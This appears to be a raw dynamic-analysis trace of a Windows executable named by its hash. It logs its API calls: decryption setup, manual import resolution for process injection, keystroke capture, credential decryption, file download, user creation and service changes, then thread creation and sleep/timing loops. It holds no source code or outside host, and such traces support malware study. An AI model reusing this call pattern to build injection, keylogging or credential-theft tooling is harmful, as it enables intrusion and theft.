(hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.857] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.857] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.857] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.857] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.857] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0121.387] GetNativeSystemInfo (in: lpSystemInfo=0x19fe64 | out: lpSystemInfo=0x19fe64*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0121.754] VirtualAlloc (lpAddress=0x0, dwSize=0x154000, flAllocationType=0x3000, flProtect=0x4) returned 0x2b50000 [0121.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x74200000 [0121.958] GetProcAddress (hModule=0x74200000, lpProcName="BCryptSetProperty") returned 0x742047e0 [0121.959] GetProcAddress (hModule=0x74200000, lpProcName="BCryptGenerateSymmetricKey") returned 0x74204910 [0121.959] GetProcAddress (hModule=0x74200000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x74203760 [0121.959] GetProcAddress (hModule=0x74200000, lpProcName="BCryptDecrypt") returned 0x74204ff0 [0121.959] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74580000 [0121.959] GetProcAddress (hModule=0x74580000, lpProcName="HeapFree") returned 0x74591ba0 [0121.959] GetProcAddress (hModule=0x74580000, lpProcName="VirtualAlloc") returned 0x74597810 [0121.959] GetProcAddress (hModule=0x74580000, lpProcName="HeapReAlloc") returned 0x7785efe0 [0121.959] GetProcAddress (hModule=0x74580000, lpProcName="VirtualQuery") returned 0x74597a90 [0121.959] GetProcAddress (hModule=0x74580000, lpProcName="TerminateThread") returned 0x745a0160 [0121.959] GetProcAddress (hModule=0x74580000, lpProcName="CreateThread") returned 0x74599b90 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="WriteProcessMemory") returned 0x745c2850 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcess") returned 0x745938c0 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="OpenProcess") returned 0x74598bf0 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="GetWindowsDirectoryA") returned 0x7459b060 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtectEx") returned 0x745c2790 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="VirtualAllocEx") returned 0x745c2730 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="CreateRemoteThread") returned 0x745c07f0 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="CreateProcessA") returned 0x745c0750 [0121.960] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleW") returned 0x74599bc0 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="IsWow64Process") returned 0x74599f10 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="WriteFile") returned 0x745a6ca0 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="CreateFileW") returned 0x745a6890 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryW") returned 0x7459a840 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="GetLocalTime") returned 0x74599be0 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentThreadId") returned 0x74591b90 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcessId") returned 0x745923e0 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="ReadFile") returned 0x745a6bb0 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="FindFirstFileA") returned 0x745a6920 [0121.961] GetProcAddress (hModule=0x74580000, lpProcName="GetBinaryTypeW") returned 0x745c7820 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="FindNextFileA") returned 0x745a6980 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="GetFullPathNameA") returned 0x745a6ad0 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="GetTempPathW") returned 0x745a6b30 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="GetPrivateProfileStringW") returned 0x745a09a0 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="CreateFileA") returned 0x745a6880 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="GlobalAlloc") returned 0x74599950 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentDirectoryW") returned 0x7459a9a0 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="SetCurrentDirectoryW") returned 0x7459fb20 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="GetFileSize") returned 0x745a6a70 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="FreeLibrary") returned 0x74599f50 [0121.962] GetProcAddress (hModule=0x74580000, lpProcName="SetDllDirectoryW") returned 0x745a5070 [0121.963] GetProcAddress (hModule=0x74580000, lpProcName="GetFileSizeEx") returned 0x745a6a80 [0121.963] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryA") returned 0x745a4bf0 [0121.963] GetProcAddress (hModule=0x74580000, lpProcName="LocalFree") returned 0x745979a0 [0121.963] GetProcAddress (hModule=0x74580000, lpProcName="WaitForSingleObject") returned 0x745a6820 [0121.963] GetProcAddress (hModule=0x74580000, lpProcName="WaitForMultipleObjects") returned 0x745a6800 [0121.963] GetProcAddress (hModule=0x74580000, lpProcName="CreatePipe") returned 0x74590540 [0121.963] GetProcAddress (hModule=0x74580000, lpProcName="PeekNamedPipe") returned 0x745c19b0 [0121.963] GetProcAddress (hModule=0x74580000, lpProcName="DuplicateHandle") returned 0x745a6640 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="SetEvent") returned 0x745a67d0 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="GetStartupInfoA") returned 0x74599c10 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="CreateEventA") returned 0x745a6680 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleFileNameW") returned 0x74599b00 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="LoadResource") returned 0x745976f0 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="FindResourceW") returned 0x745a2a40 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="GetComputerNameW") returned 0x745a46a0 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="GlobalMemoryStatusEx") returned 0x7459afe0 [0121.964] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryExW") returned 0x74597930 [0121.965] GetProcAddress (hModule=0x74580000, lpProcName="FindFirstFileW") returned 0x745a6960 [0121.965] GetProcAddress (hModule=0x74580000, lpProcName="FindNextFileW") returned 0x745a69a0 [0121.965] GetProcAddress (hModule=0x74580000, lpProcName="SetFilePointer") returned 0x745a6c40 [0121.965] GetProcAddress (hModule=0x74580000, lpProcName="GetLogicalDriveStringsW") returned 0x745a6af0 [0121.965] GetProcAddress (hModule=0x74580000, lpProcName="DeleteFileW") returned 0x745a68c0 [0121.965] GetProcAddress (hModule=0x74580000, lpProcName="CopyFileW") returned 0x745a6ec0 [0121.965] GetProcAddress (hModule=0x74580000, lpProcName="GetDriveTypeW") returned 0x745a6a10 [0121.965] GetProcAddress (hModule=0x74580000, lpProcName="EnterCriticalSection") returned 0x7786f290 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="LeaveCriticalSection") returned 0x7786f210 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSection") returned 0x7788a200 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="DeleteCriticalSection") returned 0x77880e60 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="GetProcessHeap") returned 0x74597710 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="ReleaseMutex") returned 0x745a67a0 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="TerminateProcess") returned 0x745a5100 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="CreateToolhelp32Snapshot") returned 0x745a7b50 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="Process32NextW") returned 0x7459d290 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="Process32FirstW") returned 0x7459f5a0 [0121.966] GetProcAddress (hModule=0x74580000, lpProcName="SizeofResource") returned 0x74598f80 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtect") returned 0x74597a50 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="GetSystemDirectoryW") returned 0x74599fd0 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="LockResource") returned 0x74597890 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="GetWindowsDirectoryW") returned 0x745a5120 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="Process32First") returned 0x7459f4d0 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="Process32Next") returned 0x7459d1c0 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="WinExec") returned 0x745bff70 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="GetTempPathA") returned 0x745a6b20 [0121.967] GetProcAddress (hModule=0x74580000, lpProcName="HeapAlloc") returned 0x77862bd0 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="lstrcmpW") returned 0x74597970 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="GetTickCount") returned 0x745a5eb0 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="lstrcpyW") returned 0x745bd260 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="WideCharToMultiByte") returned 0x74593880 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="lstrcpyA") returned 0x7459ea30 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="Sleep") returned 0x74597990 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="MultiByteToWideChar") returned 0x74592ad0 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="GetCommandLineA") returned 0x7459ab60 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleA") returned 0x745999f0 [0121.968] GetProcAddress (hModule=0x74580000, lpProcName="ExitProcess") returned 0x745a7b30 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="CreateProcessW") returned 0x7459b000 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="lstrcatA") returned 0x7459f640 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="lstrcmpA") returned 0x7459cc30 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="lstrlenA") returned 0x74598c80 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="ExpandEnvironmentStringsW") returned 0x7459cd50 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="lstrlenW") returned 0x74593690 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="CloseHandle") returned 0x745a6630 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="lstrcatW") returned 0x745bd170 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="GetLastError") returned 0x74593870 [0121.969] GetProcAddress (hModule=0x74580000, lpProcName="VirtualFree") returned 0x74597600 [0121.970] GetProcAddress (hModule=0x74580000, lpProcName="GetProcAddress") returned 0x745978b0 [0121.970] GetProcAddress (hModule=0x74580000, lpProcName="SetLastError") returned 0x74592af0 [0121.970] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleFileNameA") returned 0x7459a720 [0121.970] GetProcAddress (hModule=0x74580000, lpProcName="CreateDirectoryW") returned 0x745a6860 [0121.970] GetProcAddress (hModule=0x74580000, lpProcName="LocalAlloc") returned 0x74597a30 [0121.970] GetProcAddress (hModule=0x74580000, lpProcName="CreateMutexA") returned 0x745a66c0 [0121.970] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75640000 [0121.970] GetProcAddress (hModule=0x75640000, lpProcName="GetKeyState") returned 0x7565ddd0 [0121.970] GetProcAddress (hModule=0x75640000, lpProcName="GetMessageA") returned 0x7566e130 [0121.970] GetProcAddress (hModule=0x75640000, lpProcName="DispatchMessageA") returned 0x75676f10 [0121.971] GetProcAddress (hModule=0x75640000, lpProcName="CreateWindowExW") returned 0x75659860 [0121.971] GetProcAddress (hModule=0x75640000, lpProcName="CallNextHookEx") returned 0x75653550 [0121.971] GetProcAddress (hModule=0x75640000, lpProcName="GetAsyncKeyState") returned 0x7565e820 [0121.971] GetProcAddress (hModule=0x75640000, lpProcName="RegisterClassW") returned 0x75659800 [0121.971] GetProcAddress (hModule=0x75640000, lpProcName="GetRawInputData") returned 0x7567c3f0 [0121.971] GetProcAddress (hModule=0x75640000, lpProcName="MapVirtualKeyA") returned 0x75673e20 [0121.971] GetProcAddress (hModule=0x75640000, lpProcName="DefWindowProcA") returned 0x778baed0 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="RegisterRawInputDevices") returned 0x7567c950 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="TranslateMessage") returned 0x7565d9b0 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="GetForegroundWindow") returned 0x75678cb0 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="GetKeyNameTextW") returned 0x756a8f40 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="PostQuitMessage") returned 0x756772f0 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="GetLastInputInfo") returned 0x7566e100 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="wsprintfW") returned 0x7566f890 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="GetWindowTextW") returned 0x7566cb20 [0121.972] GetProcAddress (hModule=0x75640000, lpProcName="wsprintfA") returned 0x756704a0 [0121.973] GetProcAddress (hModule=0x75640000, lpProcName="ToUnicode") returned 0x756747d0 [0121.973] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74810000 [0121.973] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteKeyW") returned 0x748304f0 [0121.973] GetProcAddress (hModule=0x74810000, lpProcName="RegCreateKeyExW") returned 0x7482fa20 [0121.973] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExA") returned 0x74830a20 [0121.973] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteValueW") returned 0x74830fb0 [0121.973] GetProcAddress (hModule=0x74810000, lpProcName="LookupPrivilegeValueW") returned 0x7482e430 [0121.973] GetProcAddress (hModule=0x74810000, lpProcName="AdjustTokenPrivileges") returned 0x74830980 [0121.973] GetProcAddress (hModule=0x74810000, lpProcName="AllocateAndInitializeSid") returned 0x7482f660 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="OpenProcessToken") returned 0x7482f520 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="InitializeSecurityDescriptor") returned 0x7482fc00 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteKeyA") returned 0x748304a0 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="SetSecurityDescriptorDacl") returned 0x7482f830 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="RegOpenKeyExW") returned 0x7482f350 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="RegOpenKeyExA") returned 0x7482f790 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="RegEnumKeyExW") returned 0x7482f470 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="RegQueryValueExA") returned 0x7482f500 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="RegQueryInfoKeyW") returned 0x7482f640 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="RegCloseKey") returned 0x7482f620 [0121.974] GetProcAddress (hModule=0x74810000, lpProcName="OpenServiceW") returned 0x74830690 [0121.975] GetProcAddress (hModule=0x74810000, lpProcName="ChangeServiceConfigW") returned 0x748464b0 [0121.975] GetProcAddress (hModule=0x74810000, lpProcName="QueryServiceConfigW") returned 0x748305b0 [0121.975] GetProcAddress (hModule=0x74810000, lpProcName="EnumServicesStatusExW") returned 0x74830610 [0121.975] GetProcAddress (hModule=0x74810000, lpProcName="StartServiceW") returned 0x74834210 [0121.975] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExW") returned 0x7482f7f0 [0121.975] GetProcAddress (hModule=0x74810000, lpProcName="RegCreateKeyExA") returned 0x7482fa60 [0121.975] GetProcAddress (hModule=0x74810000, lpProcName="OpenSCManagerW") returned 0x74830ed0 [0121.975] GetProcAddress (hModule=0x74810000, lpProcName="CloseServiceHandle") returned 0x74830960 [0121.976] GetProcAddress (hModule=0x74810000, lpProcName="GetTokenInformation") returned 0x7482f370 [0121.976] GetProcAddress (hModule=0x74810000, lpProcName="LookupAccountSidW") returned 0x7482f590 [0121.976] GetProcAddress (hModule=0x74810000, lpProcName="FreeSid") returned 0x74830440 [0121.976] GetProcAddress (hModule=0x74810000, lpProcName="RegQueryValueExW") returned 0x7482f330 [0121.976] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75db0000 [0121.976] GetProcAddress (hModule=0x75db0000, lpProcName="ShellExecuteExA") returned 0x76020290 [0121.976] GetProcAddress (hModule=0x75db0000, lpProcName="ShellExecuteExW") returned 0x75f4e690 [0121.976] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetSpecialFolderPathW") returned 0x75f5f9c0 [0121.976] GetProcAddress (hModule=0x75db0000, lpProcName="SHCreateDirectoryExW") returned 0x75f60490 [0121.977] GetProcAddress (hModule=0x75db0000, lpProcName="ShellExecuteW") returned 0x75f4d9f0 [0121.977] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetFolderPathW") returned 0x75f54e80 [0121.977] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetKnownFolderPath") returned 0x75f59710 [0121.977] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x717f0000 [0123.591] GetProcAddress (hModule=0x717f0000, lpProcName="URLDownloadToFileW") returned 0x7186b240 [0123.591] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75b90000 [0124.023] GetProcAddress (hModule=0x75b90000, lpProcName="InetNtopW") returned 0x75bbbd80 [0124.027] GetProcAddress (hModule=0x75b90000, lpProcName="getaddrinfo") returned 0x75ba55c0 [0124.027] GetProcAddress (hModule=0x75b90000, lpProcName="freeaddrinfo") returned 0x75ba5ee0 [0124.027] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x753d0000 [0124.027] GetProcAddress (hModule=0x753d0000, lpProcName="CoInitializeSecurity") returned 0x75cb3870 [0124.027] GetProcAddress (hModule=0x753d0000, lpProcName="CoCreateInstance") returned 0x75c70060 [0124.028] GetProcAddress (hModule=0x753d0000, lpProcName="CoInitialize") returned 0x75401930 [0124.028] GetProcAddress (hModule=0x753d0000, lpProcName="CoUninitialize") returned 0x75c492a0 [0124.028] GetProcAddress (hModule=0x753d0000, lpProcName="CoTaskMemFree") returned 0x75c49170 [0124.028] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x77680000 [0124.028] GetProcAddress (hModule=0x77680000, lpProcName="StrStrW") returned 0x77698540 [0124.028] GetProcAddress (hModule=0x77680000, lpProcName="PathRemoveFileSpecA") returned 0x776a2d80 [0124.028] GetProcAddress (hModule=0x77680000, lpProcName="StrStrA") returned 0x776a3570 [0124.029] GetProcAddress (hModule=0x77680000, lpProcName="PathCombineA") returned 0x776a28e0 [0124.029] GetProcAddress (hModule=0x77680000, lpProcName="PathFindFileNameW") returned 0x77697a50 [0124.029] GetProcAddress (hModule=0x77680000, lpProcName="PathFileExistsW") returned 0x77698670 [0124.029] GetProcAddress (hModule=0x77680000, lpProcName="PathFindExtensionW") returned 0x77697960 [0124.029] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x74d00000 [0124.196] GetProcAddress (hModule=0x74d00000, lpProcName="NetLocalGroupAddMembers") returned 0x6f8782b0 [0124.325] GetProcAddress (hModule=0x74d00000, lpProcName="NetUserAdd") returned 0x6f87ba50 [0124.325] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x74660000 [0124.325] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75830000 [0125.049] GetProcAddress (hModule=0x75830000, lpProcName="CryptUnprotectData") returned 0x75853140 [0125.050] GetProcAddress (hModule=0x75830000, lpProcName="CryptStringToBinaryA") returned 0x7584d6d0 [0125.050] GetProcAddress (hModule=0x75830000, lpProcName="CryptStringToBinaryW") returned 0x7584d5a0 [0125.050] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74800000 [0125.134] GetProcAddress (hModule=0x74800000, lpProcName="GetModuleFileNameExW") returned 0x748013e0 [0125.134] VirtualProtect (in: lpAddress=0x2b51000, dwSize=0x13000, flNewProtect=0x20, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0125.149] VirtualProtect (in: lpAddress=0x2b64000, dwSize=0x4a00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0125.149] VirtualProtect (in: lpAddress=0x2b69000, dwSize=0x600, flNewProtect=0x4, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0125.150] VirtualProtect (in: lpAddress=0x2c9f000, dwSize=0x2e00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0125.151] VirtualProtect (in: lpAddress=0x2ca2000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0125.151] VirtualProtect (in: lpAddress=0x2ca3000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0125.151] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0 [0125.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2b55ce2, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c0 [0125.160] Sleep (dwMilliseconds=0x320) [0126.160] Sleep (dwMilliseconds=0x320) [0127.558] Sleep (dwMilliseconds=0x320) [0128.866] Sleep (dwMilliseconds=0x320) [0129.674] Sleep (dwMilliseconds=0x320) [0131.179] Sleep (dwMilliseconds=0x320) [0132.006] Sleep (dwMilliseconds=0x320) [0133.349] Sleep (dwMilliseconds=0x320) [0134.330] Sleep (dwMilliseconds=0x320) [0135.179] Sleep (dwMilliseconds=0x320) [0136.469] Sleep (dwMilliseconds=0x320) [0137.455] Sleep (dwMilliseconds=0x320) [0139.840] Sleep (dwMilliseconds=0x320) [0140.737] Sleep (dwMilliseconds=0x320) Thread: id = 2 os_tid = 0xca4 Thread: id = 3 os_tid = 0x8f4 [0125.307] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe\" " [0125.307] GetStartupInfoA (in: lpStartupInfo=0x2daff3c | out: lpStartupInfo=0x2daff3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0125.307] GetProcessHeap () returned 0x7c0000 [0125.307] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x80) returned 0x7d0088 [0125.310] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c4 [0125.314] GetProcessHeap () returned 0x7c0000 [0125.314] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x38) returned 0x7d5468 [0125.314] GetProcessHeap () returned 0x7c0000 [0125.314] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x14) returned 0x7db5c8 [0125.314] GetProcessHeap () returned 0x7c0000 [0125.314] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x28) returned 0x7dc520 [0125.314] GetProcessHeap () returned 0x7c0000 [0125.314] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x50) returned 0x7d0110 [0125.314] GetProcessHeap () returned 0x7c0000 [0125.322] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xa0) returned 0x7d16a0 [0125.323] CoInitialize (pvReserved=0x0) returned 0x0 [0125.324] CoCreateInstance (in: rclsid=0x2b645e0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2b673f0*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0x2dafef8 | out: ppv=0x2dafef8*=0xa204a0) returned 0x0 [0128.015] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0xa204a0, clsidDeviceClass=0x2b645d0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0x2dafefc, dwFlags=0x0 | out: ppenumMoniker=0x2dafefc*=0x0) returned 0x1 [0131.330] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x9d0000 [0131.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0131.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x9f0000 [0131.332] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xa00000 [0131.332] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xa10000 [0131.332] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2e30000 [0131.333] GetProcessHeap () returned 0x7c0000 [0131.333] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7e1a48 [0131.333] GetProcessHeap () returned 0x7c0000 [0131.333] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7e17a0 [0131.333] GetProcessHeap () returned 0x7c0000 [0131.333] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7e1430 [0131.333] GetProcessHeap () returned 0x7c0000 [0131.334] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7e14d0 [0131.334] GetProcessHeap () returned 0x7c0000 [0131.334] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7e15e8 [0131.334] GetProcessHeap () returned 0x7c0000 [0131.334] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7e15c0 [0131.334] Sleep (dwMilliseconds=0x1) [0131.336] GetTickCount () returned 0x151f10f [0131.336] Sleep (dwMilliseconds=0x1) [0131.337] GetTickCount () returned 0x151f11f [0131.337] Sleep (dwMilliseconds=0x1) [0131.339] GetTickCount () returned 0x151f11f 